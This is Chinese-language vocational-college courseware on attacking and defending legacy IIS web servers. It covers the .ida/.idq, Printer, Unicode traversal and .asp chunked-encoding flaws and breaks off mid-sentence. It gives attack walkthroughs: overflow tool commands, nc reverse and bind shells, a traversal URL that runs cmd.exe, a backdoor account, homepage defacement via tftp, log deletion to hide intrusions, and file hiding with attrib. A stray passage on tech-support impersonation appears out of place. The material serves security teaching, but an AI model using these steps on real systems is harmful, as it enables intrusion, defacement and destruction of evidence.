学习情境三服务器入侵技术的应用与防护任务一Web服务器课件

学习情境三服务器入侵技术的应用与防护任务一Web服务器的入侵与防护

课程负责人：杨文虎济南铁道职业技术学院信息工程系课程负责人：杨文虎济南铁道职业技术学院信息工程系3.1Web服务器的入侵与防护教学的实施过程任务规划学生探究师生析疑完成任务检查评测综合创新思考、探讨完成任务需要的相关资料，搜集资料，制定工作计划

明确需要完成的工作任务；教师进行点评、确定最终的实施方法；对技术问题进行讲授和答疑。学生进入网络实训室，根据工作计划完成每个工作项目，完成每个项目实施日志和心得总结

学生分攻防角色相互检查任务完成情况，分析不足，给出评价；教师对学生的日志和总结进行分析，给出评价。探索更多的Web服务器的应用与防护的方法，搜索相关技术，并在实训室中进行验证。3.1Web服务器的入侵与防护教学的实施过程任务规划学生探究主要的IIS漏洞有那些？其攻防技巧各有何特点？掌握.ida&.idq漏洞技术的攻防技巧了解Printer漏洞，掌握Unicode漏洞的入侵方式防护策略；了解asp映射分块编码漏洞、Webdav漏洞的入侵方式防护策略。问题引领3.1Web服务器的入侵与防护主要的IIS漏洞有那些？其攻防技巧各有何特点？问题引领3.1项目一、.ida&.idq漏洞攻防分析

Web服务器的入侵分为基于认证的入侵和基于漏洞攻击的入侵，基于认证的入侵包括以下常见的手段：IPC$入侵、远程管理计算机、Telnet入侵、远程命令的执行及进程查杀注册表的入侵、暴力破解密码等。基于漏洞攻击近几年比较流行，黑客是信息时代的完美主义者，他们通过研究、试验、编写测试代码来发现远程服务器中的漏洞，通过利用远程服务器的漏洞，可以绕过系统的认证直接进入系统内部。常用的漏洞包括：IIS漏洞、操作系统漏洞、SQL服务器漏洞IIS（InternetInformationServer），即Internet信息服务器，它在Windows系统中提供Internet服务，例如提供Web服务、FTP服务、SMTP服务，IIS服务器在方便用户使用的同时，带来了许多安全隐患。IIS漏洞有近千余种，其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。对于溢出型漏洞，入侵者可以通过发送特定指令格式的数据使远程服务区的缓冲区溢出，从而突破系统的保护，在溢出的空间中执行任意指令。主要的IIS漏洞有：.ida&.idq漏洞、Printer漏洞、Unicode漏洞、.asp映射分块编码漏洞、Webdav漏洞IIS漏洞信息的搜集主要使用扫描软件扫描存在漏洞的主机，例如使用X-Scan进行IIS漏洞的扫描，使用telnettargetIP80搜集Web服务器版本信息。

3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析Web服务器项目一、.ida&.idq漏洞攻防分析

对于.ida&.idq漏洞，微软的IndexServer可以加快Web的搜索能力，提供对管理员脚本和Internet数据的查询，默认支持管理脚本.ida和查询脚本.idq。管理脚本.ida和查询脚本.idq都是使用idq.dll来进行解析的idq.dll存在一个缓冲溢出，问题存在于idq.dll扩展程序上，由于没有对用户提交的输入参数进行边界检查，可以导致远程攻击者利用溢出来获得System权限访问远程系统。关于.ida&.idq漏洞的检测主要使用X-Scan、Sfind等检测工具，手工检测：在地址栏中输入http://targetIP/*.ida或者http://targetIP/*.idq3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析对于.ida项目一、.ida&.idq漏洞攻防分析

IDQ入侵工具IISIDQIISIDQ有命令行和图形界面两种方式。使用IISIDQ攻击远程服务器后，有两种登录方式：一是攻击后主动连接方式命令iisidq.exe<操作系统类型><目标IP><Web端口><1><端口监听端口>[输入命令1]；二是攻击后监听远程服务器连接命令iisidq.exe<操作系统类型><目标IP><Web端口><2><溢出连接IP><溢出连接端口>[输入命令1]如果不写输入命令，默认命令为cmd.exe/c+dir。如果使用，表示不使用默认命令而是要用户输入命令。IISIDQ支持的操作系统类型如下所示：0IIS5中文Win2000Sp0，1IIS5中文Win2000Sp1，2IIS5中文Win2000Sp2idq3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析IDQ入侵工具IIS项目一、.ida&.idq漏洞攻防分析

漏洞溢出连接工具-NCnc在网络工具中有“瑞士军刀”的美誉，通过nc，入侵者可以方便的连接远程服务器.nc有两种方法进行连接:主动连接到外部：nc[-options]hostnameport[s][ports]，监听等待外部连接：nc–l–pport[-option][hostname][port]NC使用的参数说明：-e:prog程序重定向，一旦连接，就执行-g:网关路由跳数,可设置到8-h：帮助信息-i：secs延时的间隔-l：监听模式，用于入站连接-n：指定数字的IP地址，不能用hostname-o：file记录16进制的传输-p：port本地端口号-r：任意指定本地及远程端口-s：addr本地源地址-u：UDP模式-v：详细输出（用两个-v可得到更详细的内容）-w：secs超时时间-z：将输入输出关掉——用于扫描时3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析漏洞溢出连接工具-N项目一、.ida&.idq漏洞攻防分析

下面我们来看几个入侵实例.idq入侵实例1步骤一：扫描远程服务器步骤二：IDQ溢出。使用连接方式一进行idq漏洞溢出。使用的命令为iisidq0068015213.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析下面我们来看项目一、.ida&.idq漏洞攻防分析

步骤三：使用nc进行连接。使用命令nc–v06521。3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析步骤三：使用nc进行项目一、.ida&.idq漏洞攻防分析

步骤四：建立后门帐号步骤五：使用exit命令断开连接，比较命令如图所示3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析步骤四：建立后门帐号项目一、.ida&.idq漏洞攻防分析

.idq入侵实例2步骤一：扫描远程服务器步骤二：使用nc在本地打开端口等待连接。使用命令nc-l–p250。参数-l表示使用监听模式，-p表示设置本地监听端口2503.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析.idq入侵实例23项目一、.ida&.idq漏洞攻防分析

步骤三：IDQ溢出。使用命令iisidq006802002501采用方式二进行溢出，使远程服务器溢出后自动连接到本地计算机的250端口3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析步骤三：IDQ溢出项目一、.ida&.idq漏洞攻防分析

步骤四：进行溢出后的攻击步骤五：建立后门帐号步骤六：使用exit命令断开连接3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析步骤四：进行项目一、.ida&.idq漏洞攻防分析

IISIDQ的图形界面3.1Web服务器的入侵与防护项目一、.ida&.idq漏洞攻防分析IISIDQ3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析技术支持假冒的缺点之一是这个假冒是在太常见了。公司已经意识到这种假冒技巧并要求防范。另一种技巧是第三方假冒，它能够更成功的获取内部信息。

.printer漏洞windows2000IIS5存在打印扩展ISAPI（InternetServiceApplicationProgrammingInterface），使得.printer扩展与msw3prt.dll进行映射，该扩展可以通过Web调用打印机。在msw3prt.dll中存在缓冲区溢出漏洞，微软建议，一般在未打补丁之前，一定要移除ISAPI网络打印的映射。步骤一：使用nc监听端口步骤二：使用IIS5Exploit进行漏洞溢出，命令格式IIS5Exploit<目标IP><入侵者IP><本地监听端口>3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析Unicode目录遍历漏洞微软IIS4.0和5.0都存在利用扩展Unicode字符取代“/”和“\”，从而可以利用“../”目录遍历的漏洞，该漏洞帐号默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一逻辑分区上的能被这些组访问的文件都能被删除，修改或执行。入侵者不能像使用.ida和.idq漏洞那样，直接溢出一个拥有管理员权限的shell，而只是具有IUSR_machinename权限，也就是说，只能进行简单的文件操作。使用Unicode构造“/”和“\”字符举例%c1%1c—>(0xc1-0xc0)*0x40+0x1c=0x5c=‘/’%c0%2f—>(0xc0-0xc0)*0x40+0x2f=0x2f=‘\’3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析手工检测漏洞我们要使用远程系统Windows2000server中文版，在地址栏输入：06/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\”3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析命令说明：命令中的“+”，代表空格，06远程服务器IP地址，scripts为远程服务器上的脚本文件目录，“..%c1%1c..”被远程服务器译为“../”，winnt/system32/cmd.exe?/c+打开远程服务器的cmd.exe，一般不用改变，dir+c:\入侵者要执行的命令，利用此命令，入侵者将IE编程了远程命令的控制台。

Unicode入侵实例—：涂鸦主页步骤一：准备标语主页，并保存成index.htm步骤二：探知远程服务器的Web根目录方法一：利用.ida或者.idq漏洞。方法二：输入06/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\mmc.gif/s其中，/s表示在dir命令后查找指定文件或文件夹的物理路径，mmc.gif是默认安装在Web根目录中的，找到该文件的同时，也就找到了Web根目录。3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析步骤三：涂鸦主页。在地址栏中使用Unicode漏洞查询Web服务器主页，假设是index.htm。使用tftp将自己做好的主页替换掉原Web服务器的主页。tftp的使用tftp只要执行tftpd32.exe，本计算机就成为一台tftp服务器，使用windows自带的tftp命令便可以在该服务器上传和下载文件。使用方法:tftp[-i]host[GET/PUT]source[destination]-I 二进制文件传输host tftp服务器地址Get 下载文件PUT 上传文件Source 文件名Destination 目的地3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析Unicode漏洞的实例二：擦脚印通过Unicode漏洞进入远程服务器后，肯定会在该服务器上留下自己的ip，为了隐藏自己，通常需要清除服务器的日志，这种做法叫作擦脚印。Del+c:\winnt\system32\logfiles\*.*Del+c:\winnt\system32\confige\*.evtDel+c:\winnt\system32\dtclog\*.*Del+c:\winnt\system32\*.logDel+c:\winnt\system32\*.txtDel+c:\winnt\*.txtDel+c:\winnt\*.logUnicode获得的权限较低，一般无法执行bat文件3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目二、Printer漏洞、Unicode漏洞攻防分析Unicode漏洞实例三：修改文件属性入侵过程中，入侵者通常希望隐藏自己的文件。如果上传的文件设置成“隐藏”加“系统”属性，就可以避免被发现。Attrib命令的使用：Attrib[+R|-R][+A|-A][+S|-S][+H|-H][[drive:][path]filename][/S/D]+:设置属性-:清除属性R:只读文件属性A：存档文件属性S：系统文件属性H：隐藏文件属性/S：处理当前文件夹及其子文件夹中的匹配文件/D：处理文件夹。如果要把c盘中的abc.exe设置成“系统”加“隐藏”属性，使用命令“attrib.exe+%2bH+%2bS+c:\abc.exe”其中，“%2b”表示“+”号，类似，要取消掉隐藏和系统属性，使用命令“attrib.exe+-H+-S+c:\abc.exe”。3.1Web服务器的入侵与防护项目二、Printer漏洞、U3.1Web服务器的入侵与防护项目三、.asp映射分块编码漏洞、Webdav攻防分析

.ASP映射分块编码漏洞Windows2000和NT4IIS.asp映射存在远程缓冲溢出漏洞。ASPISAPI过滤器默认在所有NT4和WIN2000系统中装载，存在的漏洞可以导致远程执行任意命令。恶意攻击者可以使用分块编码形式数据给IIS服务器，当解码和解析这些数据的时候可以强迫IIS把入侵者提供的数据写到内存任意位置。通过此漏洞可以导致WIN2000系统产生缓冲溢出并以IWAM_computer_name用户的权限执行任意代码，而在WINDOWS